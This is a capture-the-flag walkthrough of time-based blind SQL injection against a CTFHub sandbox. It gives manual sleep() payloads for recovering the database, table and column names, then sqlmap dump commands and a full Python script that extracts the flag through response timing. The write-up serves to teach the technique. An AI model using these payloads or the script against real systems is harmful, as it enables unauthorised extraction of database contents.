1. Challenge information
2. The page only responds after 3 seconds, so the database name is 4 characters long:
1 and if(length(database())=4,sleep(3),1)
3. Guess the database name
Each character is first bracketed with a > comparison, then confirmed with =; a 3-second delay means the condition is true:
1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)    ascii('s')=115
1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)    ascii('q')=113
1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)    ascii('l')=108
1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)    ascii('i')=105
......
Narrowing the ASCII range step by step gives the database name sqli.
4. Guess the number of tables in the current database (3-second delay, so there are 2):
1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)
5. Guess the table names (limit 0,1 selects the first table, limit 1,1 the second):
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)    ascii('n')=110
Response after 3 seconds, so the first letter of the first table is n.
Continuing the same way, the table name is news.
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)    ascii('f')=102
Response after 3 seconds, so the first letter of the second table is f.
Continuing the same way, the table name is flag.
6. Guess the number of columns in the flag table (3-second delay, so there is 1). Note that this condition filters on table_name only; adding table_schema=database() keeps a table called flag in another schema from skewing the count:
1 and if((select count(column_name) from information_schema.columns where table_name='flag')=1,sleep(3),1)
7. Guess the column name
1 and if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))=102,sleep(3),1)    ascii('f')=102
Same routine as before; the column name is flag.
8. Guess the flag value
Doing this by hand is far too slow (up to one request per printable character per position), so the manual part stops here and we switch to sqlmap.
I ran sqlmap under Kali Linux.
For installing and using sqlmap on Windows, see:
https://blog.csdn.net/weixin_45254208/article/details/104697014
1. Database name
Kali:
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" --dbs
Windows:
python sqlmap.py -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" --dbs
2. Table names
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables
3. Column names and the flag
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import requests
import time

session = requests.session()
url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id="

# The whole id value is replaced by an IF(): when the guessed character matches,
# MySQL sleeps for 1 s, otherwise the query returns 1 and the page loads normally.
# Every template takes (position, candidate character) through %d and %s.
# database name
DB_NAME = "if(substr(database(),%d,1) = '%s',sleep(1),1)"
# column name
COLUMN_NAME = ("if(substr((select column_name from information_schema.columns "
               "where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)")
# flag value
FLAG_VALUE = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)"


def table_name(index):
    # table name: limit 0,1 is the first table, limit 1,1 the second
    return ("if(substr((select table_name from information_schema.tables "
            "where table_schema='sqli' limit %d,1),%%d,1) = '%%s',sleep(1),1)" % index)


def char_matches(template, pos, ch):
    """Send one guess; a response slower than the 1 s sleep counts as a hit.

    requests leaves ' and + unencoded, which is what the payload needs.  On a
    slow or noisy link raise sleep() and this threshold together, e.g. to 3 s.
    """
    start_time = time.time()
    session.get(url=url + template % (pos, ch))
    return time.time() - start_time > 1


def extract(template, max_len):
    """Recover a string one character at a time, scanning ASCII 127 down to 32.

    '+' is sent literally and the server URL-decodes it to a space.  Once pos is
    past the end of the string substr() returns '', and MySQL's default (PAD SPACE)
    collations treat '' = ' ' as true, so a hit on '+' means the string has ended.
    """
    name = ""
    for pos in range(1, max_len + 1):
        print(pos)
        for code in range(127, 31, -1):
            ch = chr(code)
            if char_matches(template, pos, ch):
                if ch == "+":
                    return name
                name += ch
                break
        print(name)
    return name


if __name__ == "__main__":
    print("database:", extract(DB_NAME, 10))
    for k in range(2):          # the table-count query above found two tables
        print("table %d:" % k, extract(table_name(k), 10))
    print("column:", extract(COLUMN_NAME, 10))
    print("flag:", extract(FLAG_VALUE, 50))
The approach is the same as for boolean-based blind injection, only with response time as the oracle; using sqlmap is the key time-saver.